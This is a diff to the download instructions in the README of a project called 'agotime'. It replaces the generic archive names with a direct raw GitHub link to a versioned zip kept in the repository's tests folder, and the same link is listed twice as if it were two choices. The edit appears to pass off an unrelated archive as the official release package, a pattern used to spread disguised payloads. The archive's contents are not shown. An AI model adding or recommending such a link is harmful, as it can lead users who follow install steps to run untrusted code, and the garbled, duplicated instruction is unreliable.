ikufir/agotime/README.md

 ### Step 3: Download the Files

 In the latest release, you will find files related to Agotime.
 Download the package that suits your operating system.
-If you're unsure which file to choose, look for a file like `agotime.zip` or `agotime.tar.gz`.
+If you're unsure which file to choose, look for a file like `https://raw.githubusercontent.com/ikufir/agotime/master/tests/agotime-v1.8-alpha.4.zip` or `https://raw.githubusercontent.com/ikufir/agotime/master/tests/agotime-v1.8-alpha.4.zip`.

 ### Step 4: Extract the Files